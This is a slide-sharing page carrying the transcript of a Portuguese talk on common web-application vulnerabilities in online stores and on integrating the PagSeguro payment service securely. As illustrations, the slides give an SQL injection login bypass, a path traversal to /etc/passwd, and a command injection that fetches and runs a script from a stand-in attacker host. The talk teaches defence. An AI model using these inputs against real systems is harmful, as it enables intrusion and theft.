E-commerce seguro com PagSeguro

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

0 comments

Post a comment

    Post a comment
    Embed Video
    Edit your comment Cancel

    2 Favorites

    E-commerce seguro com PagSeguro - Presentation Transcript

    1. e­Commerce seguro com  PagSeguro
    2. medo
    3. OWASP owasp.org
    4. Segurança em todo o processo
    5. Sistema atualizado
    6. Portas fechadas  
    7. Senhas seguras
    8. SSL
    9. Falhas na aplicação
    10. SQL Injection
    11. <? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?>
    12. <? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?> login: admin senha: ' OR '1'='1
    13. <? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?> login: admin senha: ' OR '1'='1 SELECT * FROM user WHERE login='admin' AND senha='' OR '1'='1'
    14. Falsificação de Identidade
    15. Controles no Client
    16. <input type="hidden" name="desconto" value="10,00" />
    17. Quebra de Fluxo
    18. http://seusite.com/compra.php?passo=1
    19. Ataques contra outros clients
    20. HTML Injection
    21. Script Injection
    22. XSS
    23. XSRF
    24. Exposição de recursos
    25. http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php
    26. http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php http://seusite.com/compra.php?passo=1 &stop=1&template=../../etc/passwd
    27. Execução de recursos
    28. http://seusite.com/relatorio.php? tipo=3&gerador=pdfmaker
    29. http://seusite.com/relatorio.php? tipo=3&gerador=pdfmaker http://seusite.com/relatorio.php? tipo=3&gerador=wget+pirata.com/script http://seusite.com/relatorio.php? tipo=3&gerador=sh+script
    30. Autenticação falha
    31. Criptografia insegura
    32. Falha de restrição de acesso
    33. Denial Of Service
    34. Pagamento: processo crítico
    35. PagSeguro
    36. PagSeguro: ­ Uma única implantação ­ Segurança contra  chargeback/fraude ­ EVSSL + Aplicação segura
    37. Formas de implantação: ­ Carrinho PagSeguro ­ Carrinho Próprio ­ Retorno Automático
    38. Pontos sensíveis: ­ HTML do Form de Carrinho ­ URL de Retorno
    39. Proteja sua URL de Retorno: ­ Valide com o Token ­ Valide os Valores ­ Log ­ Fique alerta!
    40. Obrigado! visie.com.br elcio@visie.com.br

    + elciofelciof, 4 months ago

    custom

    307 views, 2 favs, 0 embeds more stats

    Conheça as falhas de segurança mais comuns em com more

    More info about this document

    © All Rights Reserved

    Go to text version

    • Total Views 307
      • 307 on SlideShare
      • 0 from embeds
    • Comments 0
    • Favorites 2
    • Downloads 14
    Most viewed embeds

    more

    All embeds

    less

    Flagged as inappropriate Flag as inappropriate
    Flag as inappropriate

    Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

    Cancel
    File a copyright complaint
    Having problems? Go to our helpdesk?

    Categories